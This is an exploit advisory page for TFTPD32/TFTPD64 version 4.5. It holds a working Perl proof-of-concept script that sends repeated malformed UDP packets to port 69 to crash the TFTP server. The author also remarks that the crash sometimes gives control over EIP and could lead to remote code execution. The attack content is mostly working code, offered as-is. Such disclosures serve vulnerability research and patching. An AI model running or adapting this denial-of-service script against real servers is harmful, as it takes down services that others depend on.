TFTPD32 / TFTPD64 4.5 Denial Of Service

2014.05.15
Credit: j0s3h4x0r
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: TFTPD32 4.5 / TFTPD64 4.5 DoS poc # Date: 13/05/2014 # Exploit Author: j0s3h4x0r # Homepage: http://tftpd32.jounin.net/tftpd32_testimonials.html # Software Link: http://tftpd32.jounin.net/download/tftpd32.450.zip # Version: 4.5 32 bits / 4.5 64 bits # Tested on: [Windows 7 x64] #this proof of concept code will crash tftpd32 and tftpd64 #you can try changing $j and $i loop limits #most of the times EIP reaches 0x2E373231 == "127." or any string contained in tftpd32 error logs #and sometimes EIP reaches addresses similar to 0x00013200 so Remote Code Execution may be possible using some form of heap-spray ## Exploit-DB Note: $j=5, $i=2500 caused a crash. #!/usr/bin/perl -w use IO::Socket; for (my $j = 0; $j < 2; $j++) { sleep(2); for (my $i = 0; $i < 1500; $i++) { $st_socket = IO::Socket::INET->new(Proto=>'udp', PeerAddr=>'127.0.0.1', PeerPort=>69) or die "connect error"; $p_c_buffer = "\x0c\x0d" x 10; print $st_socket $p_c_buffer; close($st_socket); print "sent " . $i . "\n"; } } exit;


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top